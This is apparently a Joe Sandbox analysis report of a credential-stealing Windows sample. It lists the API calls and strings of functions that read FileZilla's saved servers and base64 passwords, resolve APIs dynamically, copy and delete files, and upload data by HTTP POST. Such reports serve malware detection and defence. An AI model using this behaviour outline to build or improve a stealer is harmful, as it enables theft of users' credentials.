Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

login: , xrefs: 0040EE0A
password: , xrefs: 0040EE3B
<Host>, xrefs: 0040EBBC
<Port>, xrefs: 0040EC06
browser: FileZilla, xrefs: 0040ED99
url: , xrefs: 0040EDB7
profile: null, xrefs: 0040EDA8
<User>, xrefs: 0040EC50
<Pass encoding="base64">, xrefs: 0040EC9A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: cab5d478a700550077d3886c2a1706362e5d885cf538c2e79374ea94af899fbf
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: cab5d478a700550077d3886c2a1706362e5d885cf538c2e79374ea94af899fbf
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,0406ADE0), ref: 00415F11
GetProcAddress.KERNEL32(77190000,0406AD80), ref: 00415F2A
GetProcAddress.KERNEL32(77190000,0406ADB0), ref: 00415F42
GetProcAddress.KERNEL32(77190000,0406AA68), ref: 00415F5A
GetProcAddress.KERNEL32(77190000,04083720), ref: 00415F73
GetProcAddress.KERNEL32(77190000,04082AC0), ref: 00415F8B
GetProcAddress.KERNEL32(77190000,04068308), ref: 00415FA3
GetProcAddress.KERNEL32(77190000,04068028), ref: 00415FBC
GetProcAddress.KERNEL32(77190000,04083738), ref: 00415FD4
GetProcAddress.KERNEL32(77190000,04083768), ref: 00415FEC
GetProcAddress.KERNEL32(77190000,04083780), ref: 00416005
GetProcAddress.KERNEL32(77190000,04083750), ref: 0041601D
GetProcAddress.KERNEL32(77190000,04068188), ref: 00416035
GetProcAddress.KERNEL32(77190000,040836C0), ref: 0041604E
GetProcAddress.KERNEL32(77190000,040836D8), ref: 00416066
GetProcAddress.KERNEL32(77190000,04068248), ref: 0041607E
GetProcAddress.KERNEL32(77190000,040836F0), ref: 00416097
GetProcAddress.KERNEL32(77190000,04083708), ref: 004160AF
GetProcAddress.KERNEL32(77190000,04068008), ref: 004160C7
GetProcAddress.KERNEL32(77190000,04083450), ref: 004160E0
GetProcAddress.KERNEL32(77190000,04068268), ref: 004160F8
LoadLibraryA.KERNEL32(04083480,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(04083558,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(040834B0,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(040833C0,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(040835A0,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(76850000,04083498), ref: 00416172
GetProcAddress.KERNEL32(77040000,040833D8), ref: 00416193
GetProcAddress.KERNEL32(77040000,04083570), ref: 004161AB
GetProcAddress.KERNEL32(75A10000,04083600), ref: 004161CD
GetProcAddress.KERNEL32(75690000,04068048), ref: 004161EE
GetProcAddress.KERNEL32(776F0000,04082BA0), ref: 0041620F
GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A
F(t, xrefs: 004161B1

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: F(t$NtQueryInformationProcess
API String ID: 2238633743-4113152680
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04083B18,?,040874C8,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04083B48,00000000,?,04062038,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
RtlAllocateHeap.NTDLL(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

--, xrefs: 00404F34
", xrefs: 00405136
------, xrefs: 004051AD
J&f, xrefs: 00405029
", xrefs: 004053BA
------, xrefs: 0040506B
", xrefs: 00405278
------, xrefs: 00404F4B
------, xrefs: 004052EF

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 1133489818-3705675087
Opcode ID: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,04083B38), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,04083B58,00000000,?,04062038,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04083B18,?,040874C8,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

------, xrefs: 004059FC
------, xrefs: 00405746
J&f, xrefs: 00405878
", xrefs: 00405985
-A, xrefs: 00405620, 00405D27, 00405623
", xrefs: 00405AC6
------, xrefs: 004058BB
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,04083B38), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04083A78), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04083B18,?,040874C8,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

------, xrefs: 004047E8
", xrefs: 004049F3
J&f, xrefs: 004047A5
", xrefs: 004048B2
------, xrefs: 00404929
------, xrefs: 0040467D

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
